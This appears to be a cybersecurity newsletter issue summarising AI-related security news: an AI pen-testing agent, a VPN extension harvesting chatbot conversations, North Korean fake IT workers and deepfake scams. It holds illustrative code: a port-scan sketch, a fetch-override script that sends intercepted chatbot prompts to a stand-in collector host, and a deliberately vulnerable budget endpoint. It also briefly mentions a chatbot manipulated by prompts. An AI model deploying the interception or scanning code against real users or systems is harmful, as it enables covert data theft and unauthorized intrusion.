Cyber AI Chronicle
By Simon Ganiere · 21st December 2025
Welcome back!
Stanford researchers have achieved a breakthrough in autonomous cybersecurity testing, with their ARTEMIS agent securing second place overall against human professionals in live enterprise network penetration testing. The AI system discovered 9 valid vulnerabilities while outperforming 90% of its human competitors at a fraction of the cost.
With ARTEMIS operating at just $18 per hour compared to the $60+ hourly rate of professional pen testers, could we be witnessing the dawn of continuous, AI-powered security assessments that fundamentally reshape how organizations approach vulnerability management?
In today's AI recap:
The AI Pen Tester
The AI Chat Spy
North Korea's AI Workforce
The Deepfake Scam Economy
The AI Budget Burn
The AI Pen Tester
What you need to know: In a landmark Stanford University study, a new AI agent named ARTEMIS outperformed 9 out of 10 human cybersecurity professionals in a live penetration test of an enterprise network.
Why it's relevant:
In the experiment, ARTEMIS placed second overall, discovering 9 valid vulnerabilities and outperforming 9 of 10 human participants.
The agent excels at systematic enumeration and parallel exploitation, probing multiple targets simultaneously, at a scale where human professionals are inherently limited (see the sketch after this list).
While it still struggles with GUI-based tasks, one ARTEMIS variant operates at just $18 per hour, making it a cost-competitive alternative to professional penetration testers, who average over $60 per hour.
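The paper doesn't ship ARTEMIS's source, so the sketch below is purely illustrative: a minimal TypeScript take on the parallel-enumeration pattern described above, with hypothetical hosts, ports, and timeouts.

```typescript
// Illustrative sketch only -- not ARTEMIS's actual code.
// An agent fans out cheap TCP probes across many host:port pairs at once,
// where a human tester typically works one target at a time.
import { Socket } from "net";

function probe(host: string, port: number, timeoutMs = 1000): Promise<boolean> {
  return new Promise((resolve) => {
    const sock = new Socket();
    const done = (open: boolean) => { sock.destroy(); resolve(open); };
    sock.setTimeout(timeoutMs);
    sock.once("connect", () => done(true));   // connection accepted: port open
    sock.once("timeout", () => done(false));  // no answer within the deadline
    sock.once("error", () => done(false));    // refused or unreachable
    sock.connect(port, host);
  });
}

async function enumerate(hosts: string[], ports: number[]) {
  // Launch every host:port probe concurrently and keep only the open ones.
  const probes = hosts.flatMap((host) =>
    ports.map(async (port) => ({ host, port, open: await probe(host, port) }))
  );
  return (await Promise.all(probes)).filter((r) => r.open);
}

// Example: sweep two lab hosts' common service ports in a single pass.
enumerate(["10.0.0.5", "10.0.0.6"], [22, 80, 443, 8080]).then(console.log);
```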
Bottom line: Autonomous agents like ARTEMIS are quickly evolving into practical tools that can augment security teams by running continuous, scalable tests. This signals a major shift in offensive security, where AI will likely become an essential layer for both attackers and defenders.
Build smarter, not harder: meet Lindy
Tired of AI that just talks? Lindy actually executes.
Describe your task in plain English, and Lindy handles it—from building booking platforms to managing leads and sending team updates.
AI employees that work 24/7:
Sales automation
Customer support
Operations management
Focus on what matters. Let Lindy handle the rest.
The AI Chat Spy
What you need to know: A VPN browser extension carrying Google's "Featured" badge and used by over eight million people has been caught silently logging user conversations with major AI chatbots and selling the data. Research from Koi Security details how Urban VPN and its affiliated extensions capture everything from personal dilemmas to proprietary code.
Why it's relevant:
The extension injects platform-specific scripts into sites like ChatGPT and Claude that override native browser functions to intercept and exfiltrate all prompts and responses (see the sketch after this list).
This data harvesting was added via a silent update in July 2025, meaning millions installed the tool for privacy protection before its monitoring capabilities were activated.
Despite violating policies against selling user data to data brokers, Urban VPN received a "Featured" badge from Google's Chrome Web Store, giving users a false sense of security.
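Koi Security describes the override technique at a high level; a minimal sketch of that general monkey-patching pattern might look like the TypeScript below. The endpoint match and collector URL are hypothetical, and this is not Urban VPN's actual code.

```typescript
// Illustrative sketch of the interception pattern -- not Urban VPN's code.
// An injected script replaces window.fetch so every chat request and response
// passes through attacker-controlled logic before the page ever sees it.
const nativeFetch = window.fetch;

window.fetch = async (input: RequestInfo | URL, init?: RequestInit) => {
  const url = input instanceof Request ? input.url : input.toString();
  const response = await nativeFetch(input, init);

  if (url.includes("/conversation")) {      // hypothetical chatbot API path
    const copy = response.clone();          // read the body without consuming it
    copy.text().then((body) => {
      // Ship prompt and reply to a collector (URL is illustrative only).
      navigator.sendBeacon(
        "https://collector.example/log",
        JSON.stringify({ url, sent: init?.body ?? null, received: body })
      );
    });
  }
  return response;
};
```

Because the override runs inside the page itself, TLS and the chatbot's own server-side controls see nothing amiss, which is why vetting what runs in the browser matters as much as network-level defenses.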
Bottom line: This incident highlights the growing risk of supply chain-style attacks within the browser itself, turning privacy tools into data harvesters. As employees increasingly use AI chatbots for work, vetting browser extensions becomes a critical endpoint security control.
North Korea's AI Workforce
What you need to know: North Korean state actors stole a record-breaking $2 billion in cryptocurrency in 2025, according to a new report. Their primary method involves placing fake IT workers inside crypto firms and major tech companies by using AI-generated resumes and deepfake video interviews.
Why it's relevant:
Since April 2024, Amazon has detected and blocked over 1,800 suspected North Korean operatives attempting to gain employment, highlighting the massive scale of this infiltration campaign.
Attackers use AI tools to draft convincing resumes and social media profiles, and increasingly deploy deepfakes during video interviews to impersonate real software engineers and bypass initial screening.
Once hired, these operatives act as insiders to steal proprietary source code, siphon funds, and establish long-term persistence within corporate networks for future operations.
Bottom line: This marks a significant shift from traditional external attacks to AI-enhanced social engineering that creates insider threats at scale. Organizations must now strengthen identity verification during hiring and continuously monitor for anomalous technical behavior to counter this growing risk.
Follow Project Overwatch on LinkedIn for a daily summary of Cyber AI news and more!
The Deepfake Scam Economy
What you need to know: An investigation has uncovered 'Haotian,' a potent Deepfake-as-a-Service platform operating on Telegram that is actively marketed to 'pig butchering' and romance scammers, complete with its own criminal payment infrastructure.
Why it's relevant:
Haotian operates like a legitimate tech startup, offering tiered subscriptions, technical support, and even on-site installation, processing at least $3.9 million in payments through cryptocurrency wallets.
The tool is designed to overcome skepticism, with its developers claiming it can seamlessly defeat common liveness checks, such as asking a person to wave a hand in front of their face during a video call.
This platform is a prime example of the growing Deepfake-as-a-Service trend, which lowers the technical barrier for criminals to execute highly convincing and scalable social engineering attacks.
Bottom line: The emergence of user-friendly and powerful AI scam tools requires security leaders to update threat models beyond text-based phishing. Defenses and employee training must now prepare for a reality where seeing is no longer believing.
The AI Budget Burn
What you need to know: A report from security firm Ox Security found that weak default configurations in AI platforms like Cursor and AWS Bedrock can let attackers or rogue employees drain enterprise budgets, potentially costing millions in a matter of hours.
Why it's relevant:
The core vulnerability allows any non-admin user to modify team-wide spending limits without admin approval or any notification (see the sketch after this list).
Attackers can exploit this with malicious deep links that, when clicked, silently raise budget caps and kick off unbounded, high-cost requests.
Leaked or stolen API tokens offer a more direct attack vector, giving criminals immediate access to run their own expensive AI workloads on a company's account.
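Ox Security's report doesn't include exploit code, so here is a deliberately simplified, hypothetical Express sketch of the vulnerable pattern: the endpoint and field names are invented, but the contrast between the silent default and a hardened variant is the point.

```typescript
// Hypothetical sketch -- endpoint and field names are illustrative,
// not any vendor's actual API.
import express from "express";

const app = express();
app.use(express.json());

const team = { spendLimitUsd: 1_000 };

// Vulnerable default: any authenticated user can raise the team-wide cap,
// and nobody is notified. A malicious deep link only needs to land here.
app.post("/team/budget", (req, res) => {
  team.spendLimitUsd = req.body.spendLimitUsd;
  res.json(team);
});

// Hardened variant: require an admin role and audit every change.
app.post("/team/budget-hardened", (req, res) => {
  const role = req.header("x-user-role"); // stand-in for real auth middleware
  if (role !== "admin") {
    return res.status(403).json({ error: "admin approval required" });
  }
  console.log(`audit: spend limit ${team.spendLimitUsd} -> ${req.body.spendLimitUsd}`);
  team.spendLimitUsd = req.body.spendLimitUsd;
  res.json(team);
});

app.listen(3000);
```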
Bottom line: This exposes a systemic issue where some AI platforms prioritize rapid access over secure-by-default financial controls. Security teams must proactively audit and harden the configurations of all new AI tools rather than trusting vendor defaults.
The Shortlist
Palo Alto Networks expanded its partnership with Google Cloud in a multibillion-dollar deal to help secure AI initiatives, which includes using Google's Vertex AI and Gemini models to power its security copilots.
Mandiant demonstrated how a financial services chatbot could be manipulated with simple prompts to approve a 200-month loan at 0% APR, bypassing its safety filters during a red team exercise.
Militant groups are experimenting with AI to create propaganda, deepfakes, and refine cyberattacks, with organizations like the Islamic State group reportedly holding training workshops to help supporters learn to use the technology.
Wisdom of the Week
Stop trying to be understood by everyone.
AI Influence Level
Level 4 - AI Created, Human Basic Idea / The whole newsletter is generated via an n8n workflow based on publicly available RSS feeds, with a human in the loop reviewing the selected articles and subjects.
Reference: AI Influence Level from Daniel Miessler
Till next time!
Project Overwatch is a cutting-edge newsletter at the intersection of cybersecurity, AI, technology, and resilience, designed to navigate the complexities of our rapidly evolving digital landscape. It delivers insightful analysis and actionable intelligence, empowering you to stay ahead in a world where staying informed is not just an option, but a necessity.
